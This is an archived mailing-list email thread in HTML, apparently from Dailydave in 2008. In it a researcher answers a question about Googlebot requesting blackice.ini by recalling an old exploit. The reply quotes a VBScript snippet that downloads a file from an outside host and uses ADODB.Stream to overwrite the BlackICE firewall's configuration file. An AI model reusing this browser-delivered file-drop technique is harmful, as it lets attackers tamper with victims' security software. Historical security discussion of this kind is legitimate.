<html><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; ">My friend have you forgotten our old Black Ice exploit? God... I had to search my spool for the lulz as they say. <div><br class="webkit-block-placeholder"></div><div><span class="Apple-style-span" style="font-family: Monaco; font-size: 16px; white-space: pre; "><script language="vbscript"></span></div><div><span class="Apple-style-span" style="font-family: Times; font-size: 16px; "><pre>const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","<a href="http://www.snosoft.com/blackice.ini" ,false"="">http://www.snosoft.com/blackice.ini",false</a>
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "F:\Program Files\Network ICE\BlackICE\blackice.ini", adSaveCreateOverwrite
</script>
</pre><div><font class="Apple-style-span" face="Monaco"><span class="Apple-style-span" style="white-space: pre;">maybe this will refresh your memory:</span></font></div><div><br></div></span></div><div>"I would like to see a panel discussion about the disclosure of lame<br>bugs; I am probably going to submit a white paper on it to an upcoming<br>conference. <br><br>We do not get too concerned about local Window's BO, unless they are in<br>IE, Outlook, etc that would allow for a network vector for compromise.<br>On a system that is more commonly deployed as a multi-user system<br>(unix,linux), of course we consider a local priv escalation serious and<br>provide protection in our host based products.<br><br>We have about 15,000 corporate customers, including most of the fortune<br>1000, and in my six years at ISS not a single one has asked me for our<br>products to detect or stop a local windows BO (besides IE or Outlook). I<br>am responsible for every signature in all our products."</div><div><br class="webkit-block-placeholder"></div><div>can you name that quote? heh</div><div><span class="Apple-style-span" style="font-family: Times; font-size: 16px; "><span class="Apple-style-span" style="font-family: Helvetica; font-size: 12px; "></span><div><font class="Apple-style-span" face="Monaco"><span class="Apple-style-span" style="white-space: pre;"><font class="Apple-style-span" face="Helvetica" size="3"><span class="Apple-style-span" style="font-size: 12px; white-space: normal;">-KF</span></font></span></font></div><div><font class="Apple-style-span" face="Monaco"><span class="Apple-style-span" style="white-space: pre;"><br class="webkit-block-placeholder"></span></font></div></span><br><div><div>On Feb 20, 2008, at 8:03 PM, Adriel Desautels wrote:</div><br class="Apple-interchange-newline"><blockquote type="cite">Greetings,<br><span class="Apple-tab-span" style="white-space:pre"> </span>I was just looking over some IDS events and noticed that Google keeps looking for blackice.ini on one of our web servers. Does anyone have any idea as to why Google would be doing this? This happens on average 3-5 times a day. Nothing critical, just curious. Every time Google tries the request is denied.<br><br>Event:<br>------<br>Blocked access to : /blackice.ini<br>Reason<span class="Apple-tab-span" style="white-space:pre"> </span><span class="Apple-tab-span" style="white-space:pre"> </span> : URL file extension is restricted by policy<br>SOURCE IP<span class="Apple-tab-span" style="white-space:pre"> </span> : crawl-66-249-73-113.googlebot.com<br>Detected On<span class="Apple-tab-span" style="white-space:pre"> </span> : Web Server Logs, NIDS, Firewall Logs<br><br><br><br><br>-- <br><br>Regards,<br><span class="Apple-tab-span" style="white-space:pre"> </span>Adriel T. Desautels<br><span class="Apple-tab-span" style="white-space:pre"> </span>Chief Technology Officer<br><span class="Apple-tab-span" style="white-space:pre"> </span>Netragard, LLC.<br><span class="Apple-tab-span" style="white-space:pre"> </span>Office : 617-934-0269<br><span class="Apple-tab-span" style="white-space:pre"> </span>Mobile : 617-633-3821<br><span class="Apple-tab-span" style="white-space:pre"> </span><a href="http://www.linkedin.com/pub/1/118/a45">http://www.linkedin.com/pub/1/118/a45</a><br><br><span class="Apple-tab-span" style="white-space:pre"> </span>Join the Netragard, LLC. Linked In Group:<br><span class="Apple-tab-span" style="white-space:pre"> </span>http://www.linkedin.com/e/gis/48683/0B98E1705142<br><br>---------------------------------------------------------------<br>Netragard, LLC - http://www.netragard.com - "We make IT Safe"<br>Penetration Testing, Vulnerability Assessments, Website Security<br><span><adriel.vcf></span>_______________________________________________<br>Dailydave mailing list<br>Dailydave@lists.immunitysec.com<br>http://lists.immunitysec.com/mailman/listinfo/dailydave<br></blockquote></div><br></div></body></html>